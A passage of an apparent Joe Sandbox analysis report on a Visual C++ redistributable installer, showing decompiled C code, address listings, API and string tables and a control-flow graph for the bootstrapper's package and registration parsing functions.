									 *((intOrPtr*)( *_t321 + 8))(_t321);
									_v8 = _v8 & 0x00000000;
								}
								if(_v12 != 0) {
									__imp__#6(_v12);
									_v12 = _v12 & 0x00000000;
								}
								_t350 = _t350 + 1;
								if(_t350 < _v24) {
									continue;
								} else {
									goto L17;
								}
							}
							goto L122;
						}
						_t349 = 0x8007000e;
						_t351 = 0x8007000e;
						E000137D3(_t302, "package.cpp", 0x34, 0x8007000e);
						_push("Failed to allocate memory for rollback boundary structs.");
						goto L87;
					}
					_push("Failed to get rollback bundary node count.");
					L2:
					_push(_t351);
					E0005012F();
					goto L125;
				}
				_push("Failed to select rollback boundary nodes.");
				goto L2;
			}












































                                                                          0x0001de2b
                                                                          0x0001de32
                                                                          0x0001de36
                                                                          0x0001de3a
                                                                          0x0001de3e
                                                                          0x0001de42
                                                                          0x0001de55
                                                                          0x0001de59
                                                                          0x0001de6d
                                                                          0x0001de75
                                                                          0x0001de7a
                                                                          0x0001de7e
                                                                          0x0001de87
                                                                          0x0001de8a
                                                                          0x0001de8b
                                                                          0x0001de91
                                                                          0x0001df5e
                                                                          0x0001df5e
                                                                          0x0001df63
                                                                          0x0001df68
                                                                          0x0001df6b
                                                                          0x0001df6b
                                                                          0x0001df84
                                                                          0x0001df90
                                                                          0x0001df93
                                                                          0x0001df96
                                                                          0x0001df97
                                                                          0x0001dfa1
                                                                          0x0001dfad
                                                                          0x0001dfb2
                                                                          0x0001e603
                                                                          0x0001e603
                                                                          0x00000000
                                                                          0x0001e603
                                                                          0x0001dfc1
                                                                          0x0001dfc6
                                                                          0x0001dfcb
                                                                          0x0001dfeb
                                                                          0x0001dfee
                                                                          0x0001dff2
                                                                          0x0001dff7
                                                                          0x0001e580
                                                                          0x0001e589
                                                                          0x0001e58d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001e58f
                                                                          0x00000000
                                                                          0x0001e58f
                                                                          0x0001dffd
                                                                          0x0001dfff
                                                                          0x0001e002
                                                                          0x0001e00c
                                                                          0x0001e017
                                                                          0x0001e01b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001e02f
                                                                          0x0001e033
                                                                          0x0001e5f5
                                                                          0x0001e5f5
                                                                          0x00000000
                                                                          0x0001e5f5
                                                                          0x0001e04a
                                                                          0x0001e04e
                                                                          0x0001e5ee
                                                                          0x00000000
                                                                          0x0001e5ee
                                                                          0x0001e06f
                                                                          0x0001e08c
                                                                          0x0001e0a7
                                                                          0x0001e0ab
                                                                          0x0001e0ae
                                                                          0x0001e5d6
                                                                          0x0001e5d9
                                                                          0x0001e5de
                                                                          0x0001e5e3
                                                                          0x0001e5e3
                                                                          0x0001e5e4
                                                                          0x00000000
                                                                          0x0001e5e9
                                                                          0x0001e0b4
                                                                          0x0001e0b7
                                                                          0x0001e0c8
                                                                          0x0001e0cc
                                                                          0x0001e5cf
                                                                          0x00000000
                                                                          0x0001e5cf
                                                                          0x0001e0e3
                                                                          0x0001e0e7
                                                                          0x0001e5c8
                                                                          0x00000000
                                                                          0x0001e5c8
                                                                          0x0001e0fe
                                                                          0x0001e102
                                                                          0x0001e5c1
                                                                          0x00000000
                                                                          0x0001e5c1
                                                                          0x0001e119
                                                                          0x0001e11d
                                                                          0x0001e5ba
                                                                          0x00000000
                                                                          0x0001e5ba
                                                                          0x0001e134
                                                                          0x0001e138
                                                                          0x0001e5b3
                                                                          0x00000000
                                                                          0x0001e5b3
                                                                          0x0001e146
                                                                          0x0001e15a
                                                                          0x0001e15e
                                                                          0x0001e5ac
                                                                          0x0001e5ac
                                                                          0x00000000
                                                                          0x0001e5ac
                                                                          0x0001e175
                                                                          0x0001e17d
                                                                          0x0001e198
                                                                          0x0001e1a0
                                                                          0x0001e1b6
                                                                          0x0001e1bb
                                                                          0x0001e1c3
                                                                          0x0001e1de
                                                                          0x0001e1e6
                                                                          0x0001e207
                                                                          0x0001e218
                                                                          0x0001e220
                                                                          0x0001e241
                                                                          0x0001e25c
                                                                          0x0001e295
                                                                          0x0001e299
                                                                          0x0001e29c
                                                                          0x0001e2d2
                                                                          0x0001e30b
                                                                          0x0001e32a
                                                                          0x0001e336
                                                                          0x0001e33a
                                                                          0x0001e5a5
                                                                          0x00000000
                                                                          0x0001e5a5
                                                                          0x0001e349
                                                                          0x0001e34d
                                                                          0x0001e59e
                                                                          0x00000000
                                                                          0x0001e59e
                                                                          0x0001e353
                                                                          0x0001e358
                                                                          0x0001e35d
                                                                          0x0001e360
                                                                          0x0001e360
                                                                          0x0001e368
                                                                          0x0001e36d
                                                                          0x0001e373
                                                                          0x0001e373
                                                                          0x0001e37d
                                                                          0x0001e37e
                                                                          0x0001e384
                                                                          0x0001e387
                                                                          0x0001e38d
                                                                          0x00000000
                                                                          0x0001e393
                                                                          0x0001e393
                                                                          0x0001e398
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001e3a6
                                                                          0x0001e3ab
                                                                          0x0001e3b0
                                                                          0x0001e448
                                                                          0x0001e44b
                                                                          0x0001e46f
                                                                          0x0001e471
                                                                          0x0001e477
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001e47d
                                                                          0x0001e47f
                                                                          0x0001e482
                                                                          0x0001e485
                                                                          0x0001e487
                                                                          0x0001e491
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001e4a5
                                                                          0x0001e4b0
                                                                          0x0001e4be
                                                                          0x0001e4c1
                                                                          0x0001e4c3
                                                                          0x0001e4c6
                                                                          0x0001e4cc
                                                                          0x0001e567
                                                                          0x0001e567
                                                                          0x00000000
                                                                          0x0001e567
                                                                          0x0001e4d2
                                                                          0x0001e4d4
                                                                          0x0001e4d7
                                                                          0x0001e4da
                                                                          0x0001e4e3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001e4e5
                                                                          0x0001e4ed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001e4ef
                                                                          0x0001e4f2
                                                                          0x0001e4f2
                                                                          0x0001e4fc
                                                                          0x0001e51c
                                                                          0x0001e51f
                                                                          0x0001e529
                                                                          0x0001e52e
                                                                          0x0001e539
                                                                          0x0001e539
                                                                          0x0001e529
                                                                          0x0001e53d
                                                                          0x0001e53e
                                                                          0x0001e546
                                                                          0x0001e549
                                                                          0x0001e54c
                                                                          0x0001e54f
                                                                          0x0001e54f
                                                                          0x0001e550
                                                                          0x0001e555
                                                                          0x0001e558
                                                                          0x0001e55b
                                                                          0x0001e564
                                                                          0x00000000
                                                                          0x0001e56a
                                                                          0x0001e56a
                                                                          0x0001e56b
                                                                          0x0001e571
                                                                          0x0001e574
                                                                          0x0001e577
                                                                          0x00000000
                                                                          0x0001e482
                                                                          0x0001e44d
                                                                          0x0001e45d
                                                                          0x0001e45f
                                                                          0x0001e464
                                                                          0x0001e469
                                                                          0x0001e469
                                                                          0x00000000
                                                                          0x0001e469
                                                                          0x0001e3b6
                                                                          0x0001e3c6
                                                                          0x0001e3c8
                                                                          0x0001e3cd
                                                                          0x00000000
                                                                          0x0001e3cd
                                                                          0x0001e38d
                                                                          0x0001e30e
                                                                          0x0001e320
                                                                          0x0001e324
                                                                          0x0001e42d
                                                                          0x00000000
                                                                          0x0001e42d
                                                                          0x00000000
                                                                          0x0001e324
                                                                          0x0001e2d5
                                                                          0x0001e2e7
                                                                          0x0001e2eb
                                                                          0x0001e423
                                                                          0x00000000
                                                                          0x0001e423
                                                                          0x0001e2f1
                                                                          0x00000000
                                                                          0x0001e2f1
                                                                          0x0001e29f
                                                                          0x0001e2a8
                                                                          0x0001e2ad
                                                                          0x0001e2b1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001e2b3
                                                                          0x00000000
                                                                          0x0001e2b3
                                                                          0x0001e25f
                                                                          0x0001e271
                                                                          0x0001e275
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001e27b
                                                                          0x00000000
                                                                          0x0001e27b
                                                                          0x0001e224
                                                                          0x0001e419
                                                                          0x00000000
                                                                          0x0001e419
                                                                          0x0001e237
                                                                          0x0001e23b
                                                                          0x0001e40c
                                                                          0x0001e40f
                                                                          0x00000000
                                                                          0x0001e40f
                                                                          0x00000000
                                                                          0x0001e23b
                                                                          0x0001e1ea
                                                                          0x0001e402
                                                                          0x00000000
                                                                          0x0001e402
                                                                          0x0001e1fd
                                                                          0x0001e201
                                                                          0x0001e3f5
                                                                          0x0001e3f8
                                                                          0x00000000
                                                                          0x0001e3f8
                                                                          0x00000000
                                                                          0x0001e3eb
                                                                          0x0001e3eb
                                                                          0x00000000
                                                                          0x0001e3eb
                                                                          0x0001e3e1
                                                                          0x0001e3e1
                                                                          0x00000000
                                                                          0x0001e3e1
                                                                          0x0001e3d7
                                                                          0x0001e3d7
                                                                          0x00000000
                                                                          0x0001e3d7
                                                                          0x0001e17d
                                                                          0x0001e08e
                                                                          0x00000000
                                                                          0x0001e08e
                                                                          0x0001e071
                                                                          0x00000000
                                                                          0x0001e071
                                                                          0x0001e5fc
                                                                          0x0001e5fc
                                                                          0x00000000
                                                                          0x0001e5fc
                                                                          0x0001dfcd
                                                                          0x0001dfda
                                                                          0x0001dfdc
                                                                          0x0001dfe1
                                                                          0x00000000
                                                                          0x0001dfe1
                                                                          0x0001dfa3
                                                                          0x00000000
                                                                          0x0001df86
                                                                          0x0001df86
                                                                          0x0001e594
                                                                          0x0001e594
                                                                          0x0001e595
                                                                          0x0001e595
                                                                          0x0001e605
                                                                          0x0001e607
                                                                          0x0001e607
                                                                          0x0001e60c
                                                                          0x0001e611
                                                                          0x0001e611
                                                                          0x0001e614
                                                                          0x0001e619
                                                                          0x0001e61e
                                                                          0x0001e61e
                                                                          0x0001e625
                                                                          0x0001e62a
                                                                          0x0001e62a
                                                                          0x0001e634
                                                                          0x0001e639
                                                                          0x0001e639
                                                                          0x0001e644
                                                                          0x0001e644
                                                                          0x0001df84
                                                                          0x0001de9d
                                                                          0x0001dea2
                                                                          0x0001dea6
                                                                          0x0001dec6
                                                                          0x0001dec9
                                                                          0x0001decb
                                                                          0x0001ded0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ded6
                                                                          0x0001ded6
                                                                          0x0001dedb
                                                                          0x0001deee
                                                                          0x0001def2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001df08
                                                                          0x0001df0c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001df26
                                                                          0x0001df2a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001df30
                                                                          0x0001df35
                                                                          0x0001df3a
                                                                          0x0001df3d
                                                                          0x0001df3d
                                                                          0x0001df45
                                                                          0x0001df4a
                                                                          0x0001df50
                                                                          0x0001df50
                                                                          0x0001df54
                                                                          0x0001df58
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001df58
                                                                          0x00000000
                                                                          0x0001ded6
                                                                          0x0001dea8
                                                                          0x0001deb5
                                                                          0x0001deb7
                                                                          0x0001debc
                                                                          0x00000000
                                                                          0x0001debc
                                                                          0x0001de80
                                                                          0x0001de60
                                                                          0x0001de60
                                                                          0x0001de61
                                                                          0x00000000
                                                                          0x0001de67
                                                                          0x0001de5b
                                                                          0x00000000

                                                                          APIs
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0001DF4A
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0001E62A
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeHeapString$AllocateProcess
                                                                          • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                                          • API String ID: 336948655-2612374807
                                                                          • Opcode ID: a81d53137853984b1ed41e759b6910e40e517f8a3aa647573862b3a30aac1509
                                                                          • Instruction ID: c0c7d79daeff6e668c277e139110e4174969452a3b6b7c025a48da6c60b35d02
                                                                          • Opcode Fuzzy Hash: a81d53137853984b1ed41e759b6910e40e517f8a3aa647573862b3a30aac1509
                                                                          • Instruction Fuzzy Hash: 9732D231D40666EBDB219B54CC41FEEBBB6AF04729F104265FE11BB291D771AE80CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001F86E Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 445COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 220 1f86e-1f8a4 call 5388a 223 1f8a6-1f8b3 call 5012f 220->223 224 1f8b8-1f8d1 call 531c7 220->224 231 1fda0-1fda5 223->231 229 1f8d3-1f8d8 224->229 230 1f8dd-1f8f2 call 531c7 224->230 232 1fd97-1fd9e call 5012f 229->232 242 1f8f4-1f8f9 230->242 243 1f8fe-1f90b call 1e936 230->243 234 1fda7-1fda9 231->234 235 1fdad-1fdb2 231->235 248 1fd9f 232->248 234->235 238 1fdb4-1fdb6 235->238 239 1fdba-1fdbf 235->239 238->239 240 1fdc1-1fdc3 239->240 241 1fdc7-1fdcb 239->241 240->241 245 1fdd5-1fddc 241->245 246 1fdcd-1fdd0 call 554ef 241->246 242->232 251 1f917-1f92c call 531c7 243->251 252 1f90d-1f912 243->252 246->245 248->231 255 1f938-1f94a call 54b5a 251->255 256 1f92e-1f933 251->256 252->232 259 1f959-1f96e call 531c7 255->259 260 1f94c-1f954 255->260 256->232 265 1f970-1f975 259->265 266 1f97a-1f98f call 531c7 259->266 261 1fc23-1fc2c call 5012f 260->261 261->248 265->232 270 1f991-1f996 266->270 271 1f99b-1f9ad call 533db 266->271 270->232 274 1f9b9-1f9cf call 5388a 271->274 275 1f9af-1f9b4 271->275 278 1f9d5-1f9d7 274->278 279 1fc7e-1fc98 call 1ebb2 274->279 275->232 280 1f9e3-1f9f8 call 533db 278->280 281 1f9d9-1f9de 278->281 286 1fca4-1fcbc call 5388a 279->286 287 1fc9a-1fc9f 279->287 288 1fa04-1fa19 call 531c7 280->288 289 1f9fa-1f9ff 280->289 281->232 294 1fcc2-1fcc4 286->294 295 1fd86-1fd87 call 1efe5 286->295 287->232 297 1fa29-1fa3e call 531c7 288->297 298 1fa1b-1fa1d 288->298 289->232 299 1fcd0-1fcee call 531c7 294->299 300 1fcc6-1fccb 294->300 301 1fd8c-1fd90 295->301 308 1fa40-1fa42 297->308 309 1fa4e-1fa63 call 531c7 297->309 298->297 302 1fa1f-1fa24 298->302 310 1fcf0-1fcf5 299->310 311 1fcfa-1fd12 call 531c7 299->311 300->232 301->248 305 1fd92 301->305 302->232 305->232 308->309 314 1fa44-1fa49 308->314 319 1fa73-1fa88 call 531c7 309->319 320 1fa65-1fa67 309->320 310->232 317 1fd14-1fd16 311->317 318 1fd1f-1fd37 call 531c7 311->318 314->232 317->318 321 1fd18-1fd1d 317->321 327 1fd44-1fd5c call 531c7 318->327 328 1fd39-1fd3b 318->328 329 1fa98-1faad call 531c7 319->329 330 1fa8a-1fa8c 319->330 320->319 322 1fa69-1fa6e 320->322 321->232 322->232 337 1fd65-1fd7d call 531c7 327->337 338 1fd5e-1fd63 327->338 328->327 331 1fd3d-1fd42 328->331 339 1fabd-1fad2 call 531c7 329->339 340 1faaf-1fab1 329->340 330->329 332 1fa8e-1fa93 330->332 331->232 332->232 337->295 346 1fd7f-1fd84 337->346 338->232 347 1fae2-1faf7 call 531c7 339->347 348 1fad4-1fad6 339->348 340->339 343 1fab3-1fab8 340->343 343->232 346->232 352 1fb07-1fb1c call 531c7 347->352 353 1faf9-1fafb 347->353 348->347 349 1fad8-1fadd 348->349 349->232 357 1fb2c-1fb44 call 531c7 352->357 358 1fb1e-1fb20 352->358 353->352 354 1fafd-1fb02 353->354 354->232 362 1fb54-1fb6c call 531c7 357->362 363 1fb46-1fb48 357->363 358->357 359 1fb22-1fb27 358->359 359->232 367 1fb7c-1fb91 call 531c7 362->367 368 1fb6e-1fb70 362->368 363->362 364 1fb4a-1fb4f 363->364 364->232 372 1fc31-1fc33 367->372 373 1fb97-1fbb4 CompareStringW 367->373 368->367 369 1fb72-1fb77 368->369 369->232 374 1fc35-1fc3c 372->374 375 1fc3e-1fc40 372->375 376 1fbb6-1fbbc 373->376 377 1fbbe-1fbd3 CompareStringW 373->377 374->375 378 1fc42-1fc47 375->378 379 1fc4c-1fc64 call 533db 375->379 380 1fbff-1fc04 376->380 381 1fbe1-1fbf6 CompareStringW 377->381 382 1fbd5-1fbdf 377->382 378->232 379->279 389 1fc66-1fc68 379->389 380->375 383 1fc06-1fc1e call 137d3 381->383 384 1fbf8 381->384 382->380 383->261 384->380 390 1fc74 389->390 391 1fc6a-1fc6f 389->391 390->279 391->232
                                                                          C-Code - Quality: 67%
                                                                          			E0001F86E(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				short* _v16;
				void* _v20;
				void* _t88;
				void* _t112;
				int _t158;
				void* _t164;
				signed int _t166;
				intOrPtr* _t167;
				intOrPtr* _t168;
				intOrPtr* _t169;
				void* _t174;
				intOrPtr _t176;
				void* _t179;
				void* _t188;
				void* _t190;

				_t174 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				_t88 = E0005388A(_a8, L"Registration",  &_v12);
				_t164 = 0x80070490;
				_t179 =  ==  ? 0x80070490 : _t88;
				if(_t179 >= 0) {
					_push(__edi);
					_t176 = _a4;
					_t8 = _t176 + 0x10; // 0x1534d
					if(E000531C7(_v12, L"Id", _t8) >= 0) {
						_t10 = _t176 + 0x14; // 0x15351
						if(E000531C7(_v12, L"Tag", _t10) >= 0) {
							if(E0001E936(_t176, _t176, _a8) >= 0) {
								if(E000531C7(_v12, L"Version",  &_v16) >= 0) {
									_t15 = _t176 + 0x38; // 0x15375
									if(E00054B5A(_t174, _v16, 0, _t15) >= 0) {
										_t18 = _t176 + 0x44; // 0x15381
										if(E000531C7(_v12, L"ProviderKey", _t18) >= 0) {
											_t20 = _t176 + 0x48; // 0x15385
											if(E000531C7(_v12, L"ExecutableName", _t20) >= 0) {
												if(E000533DB(_t166, _v12, L"PerMachine", _t176) >= 0) {
													_t188 = E0005388A(_v12, L"Arp",  &_v8);
													if(_t188 == 1) {
														L71:
														_t62 = _t176 + 0x98; // 0x153d5
														_t63 = _t176 + 0x94; // 0x153d1
														if(E0001EBB2(_v12, _t63, _t62) >= 0) {
															_t190 = E0005388A(_v12, L"Update",  &_v20);
															if(_t190 == 1) {
																L88:
																_t112 = E0001EFE5(_t166, _t176); // executed
																_t190 = _t112;
																if(_t190 >= 0) {
																	L91:
																	L92:
																	_t167 = _v12;
																	if(_t167 != 0) {
																		 *((intOrPtr*)( *_t167 + 8))(_t167);
																	}
																	_t168 = _v8;
																	if(_t168 != 0) {
																		 *((intOrPtr*)( *_t168 + 8))(_t168);
																	}
																	_t169 = _v20;
																	if(_t169 != 0) {
																		 *((intOrPtr*)( *_t169 + 8))(_t169);
																	}
																	if(_v16 != 0) {
																		E000554EF(_v16);
																	}
																	return _t190;
																}
																_push("Failed to set registration paths.");
																L90:
																_push(_t190);
																E0005012F();
																goto L91;
															}
															if(_t190 >= 0) {
																 *((intOrPtr*)(_t176 + 0x9c)) = 1;
																_t68 = _t176 + 0xa0; // 0x153dd
																_t190 = E000531C7(_v20, L"Manufacturer", _t68);
																if(_t190 >= 0) {
																	_t70 = _t176 + 0xa4; // 0x153e1
																	_t190 = E000531C7(_v20, L"Department", _t70);
																	if(_t190 == _t164 || _t190 >= 0) {
																		_t72 = _t176 + 0xa8; // 0x153e5
																		_t190 = E000531C7(_v20, L"ProductFamily", _t72);
																		if(_t190 == _t164 || _t190 >= 0) {
																			_t74 = _t176 + 0xac; // 0x153e9
																			_t190 = E000531C7(_v20, L"Name", _t74);
																			if(_t190 >= 0) {
																				_t76 = _t176 + 0xb0; // 0x153ed
																				_t190 = E000531C7(_v20, L"Classification", _t76);
																				if(_t190 >= 0) {
																					goto L88;
																				}
																				_push("Failed to get @Classification.");
																				goto L90;
																			}
																			_push("Failed to get @Name.");
																		} else {
																			_push("Failed to get @ProductFamily.");
																		}
																	} else {
																		_push("Failed to get @Department.");
																	}
																	goto L90;
																}
																_push("Failed to get @Manufacturer.");
																goto L90;
															}
															_push("Failed to select Update node.");
															goto L90;
														}
														_push("Failed to parse software tag.");
														goto L90;
													}
													if(_t188 >= 0) {
														_t25 = _t176 + 4; // 0x15341
														_t190 = E000533DB(_t166, _v8, L"Register", _t25);
														if(_t190 >= 0) {
															_t27 = _t176 + 0x60; // 0x1539d
															_t190 = E000531C7(_v8, L"DisplayName", _t27);
															if(_t190 == 0x80070490 || _t190 >= 0) {
																_t29 = _t176 + 0x64; // 0x153a1
																_t190 = E000531C7(_v8, L"DisplayVersion", _t29);
																if(_t190 == _t164 || _t190 >= 0) {
																	_t31 = _t176 + 0x68; // 0x153a5
																	_t190 = E000531C7(_v8, L"Publisher", _t31);
																	if(_t190 == _t164 || _t190 >= 0) {
																		_t33 = _t176 + 0x6c; // 0x153a9
																		_t190 = E000531C7(_v8, L"HelpLink", _t33);
																		if(_t190 == _t164 || _t190 >= 0) {
																			_t35 = _t176 + 0x70; // 0x153ad
																			_t190 = E000531C7(_v8, L"HelpTelephone", _t35);
																			if(_t190 == _t164 || _t190 >= 0) {
																				_t37 = _t176 + 0x74; // 0x153b1
																				_t190 = E000531C7(_v8, L"AboutUrl", _t37);
																				if(_t190 == _t164 || _t190 >= 0) {
																					_t39 = _t176 + 0x78; // 0x153b5
																					_t190 = E000531C7(_v8, L"UpdateUrl", _t39);
																					if(_t190 == _t164 || _t190 >= 0) {
																						_t41 = _t176 + 0x7c; // 0x153b9
																						_t190 = E000531C7(_v8, L"ParentDisplayName", _t41);
																						if(_t190 == _t164 || _t190 >= 0) {
																							_t43 = _t176 + 0x80; // 0x153bd
																							_t190 = E000531C7(_v8, L"Comments", _t43);
																							if(_t190 == _t164 || _t190 >= 0) {
																								_t45 = _t176 + 0x84; // 0x153c1
																								_t190 = E000531C7(_v8, L"Contact", _t45);
																								if(_t190 == _t164 || _t190 >= 0) {
																									_t190 = E000531C7(_v8, L"DisableModify",  &_v16);
																									if(_t190 < 0) {
																										if(_t190 == _t164) {
																											 *(_t176 + 0x88) =  *(_t176 + 0x88) & 0x00000000;
																											_t190 = 0;
																										}
																										L65:
																										if(_t190 >= 0) {
																											_t59 = _t176 + 0x90; // 0x153cd
																											_t190 = E000533DB(_t166, _v8, L"DisableRemove", _t59);
																											if(_t190 == _t164) {
																												goto L71;
																											}
																											if(_t190 >= 0) {
																												 *(_t176 + 0x8c) = 1;
																												goto L71;
																											}
																											_push("Failed to get @DisableRemove.");
																											goto L90;
																										}
																										_push("Failed to get @DisableModify.");
																										goto L90;
																									}
																									_t158 = CompareStringW(0x7f, 0, _v16, 0xffffffff, L"button", 0xffffffff);
																									_t166 = 2;
																									if(_t158 != _t166) {
																										if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"yes", 0xffffffff) != 2) {
																											if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"no", 0xffffffff) != 2) {
																												_t190 = 0x8000ffff;
																												E000137D3(_t160, "registration.cpp", 0xf6, 0x8000ffff);
																												_push(_v16);
																												_push("Invalid modify disabled type: %ls");
																												L62:
																												_push(_t190);
																												E0005012F();
																												goto L91;
																											}
																											 *(_t176 + 0x88) =  *(_t176 + 0x88) & 0x00000000;
																											L60:
																											_t164 = 0x80070490;
																											goto L65;
																										}
																										 *(_t176 + 0x88) = 1;
																										goto L60;
																									}
																									 *(_t176 + 0x88) = _t166;
																									goto L60;
																								} else {
																									_push("Failed to get @Contact.");
																									goto L90;
																								}
																							} else {
																								_push("Failed to get @Comments.");
																								goto L90;
																							}
																						} else {
																							_push("Failed to get @ParentDisplayName.");
																							goto L90;
																						}
																					} else {
																						_push("Failed to get @UpdateUrl.");
																						goto L90;
																					}
																				} else {
																					_push("Failed to get @AboutUrl.");
																					goto L90;
																				}
																			} else {
																				_push("Failed to get @HelpTelephone.");
																				goto L90;
																			}
																		} else {
																			_push("Failed to get @HelpLink.");
																			goto L90;
																		}
																	} else {
																		_push("Failed to get @Publisher.");
																		goto L90;
																	}
																} else {
																	_push("Failed to get @DisplayVersion.");
																	goto L90;
																}
															} else {
																_push("Failed to get @DisplayName.");
																goto L90;
															}
														}
														_push("Failed to get @Register.");
														goto L90;
													}
													_push("Failed to select ARP node.");
													goto L90;
												}
												_push("Failed to get @PerMachine.");
												goto L90;
											}
											_push("Failed to get @ExecutableName.");
											goto L90;
										}
										_push("Failed to get @ProviderKey.");
										goto L90;
									}
									_push(_v16);
									_push("Failed to parse @Version: %ls");
									goto L62;
								}
								_push("Failed to get @Version.");
								goto L90;
							}
							_push("Failed to parse related bundles");
							goto L90;
						}
						_push("Failed to get @Tag.");
						goto L90;
					}
					_push("Failed to get @Id.");
					goto L90;
				}
				_push("Failed to select registration node.");
				_push(_t179);
				E0005012F();
				goto L92;
			}




















                                                                          0x0001f86e
                                                                          0x0001f878
                                                                          0x0001f87b
                                                                          0x0001f87e
                                                                          0x0001f881
                                                                          0x0001f890
                                                                          0x0001f897
                                                                          0x0001f89f
                                                                          0x0001f8a4
                                                                          0x0001f8b8
                                                                          0x0001f8b9
                                                                          0x0001f8bc
                                                                          0x0001f8d1
                                                                          0x0001f8dd
                                                                          0x0001f8f2
                                                                          0x0001f90b
                                                                          0x0001f92c
                                                                          0x0001f938
                                                                          0x0001f94a
                                                                          0x0001f959
                                                                          0x0001f96e
                                                                          0x0001f97a
                                                                          0x0001f98f
                                                                          0x0001f9ad
                                                                          0x0001f9ca
                                                                          0x0001f9cf
                                                                          0x0001fc7e
                                                                          0x0001fc7e
                                                                          0x0001fc85
                                                                          0x0001fc98
                                                                          0x0001fcb5
                                                                          0x0001fcbc
                                                                          0x0001fd86
                                                                          0x0001fd87
                                                                          0x0001fd8c
                                                                          0x0001fd90
                                                                          0x0001fd9f
                                                                          0x0001fda0
                                                                          0x0001fda0
                                                                          0x0001fda5
                                                                          0x0001fdaa
                                                                          0x0001fdaa
                                                                          0x0001fdad
                                                                          0x0001fdb2
                                                                          0x0001fdb7
                                                                          0x0001fdb7
                                                                          0x0001fdba
                                                                          0x0001fdbf
                                                                          0x0001fdc4
                                                                          0x0001fdc4
                                                                          0x0001fdcb
                                                                          0x0001fdd0
                                                                          0x0001fdd0
                                                                          0x0001fddc
                                                                          0x0001fddc
                                                                          0x0001fd92
                                                                          0x0001fd97
                                                                          0x0001fd97
                                                                          0x0001fd98
                                                                          0x00000000
                                                                          0x0001fd9e
                                                                          0x0001fcc4
                                                                          0x0001fcd0
                                                                          0x0001fcd6
                                                                          0x0001fcea
                                                                          0x0001fcee
                                                                          0x0001fcfa
                                                                          0x0001fd0e
                                                                          0x0001fd12
                                                                          0x0001fd1f
                                                                          0x0001fd33
                                                                          0x0001fd37
                                                                          0x0001fd44
                                                                          0x0001fd58
                                                                          0x0001fd5c
                                                                          0x0001fd65
                                                                          0x0001fd79
                                                                          0x0001fd7d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001fd7f
                                                                          0x00000000
                                                                          0x0001fd7f
                                                                          0x0001fd5e
                                                                          0x0001fd3d
                                                                          0x0001fd3d
                                                                          0x0001fd3d
                                                                          0x0001fd18
                                                                          0x0001fd18
                                                                          0x0001fd18
                                                                          0x00000000
                                                                          0x0001fd12
                                                                          0x0001fcf0
                                                                          0x00000000
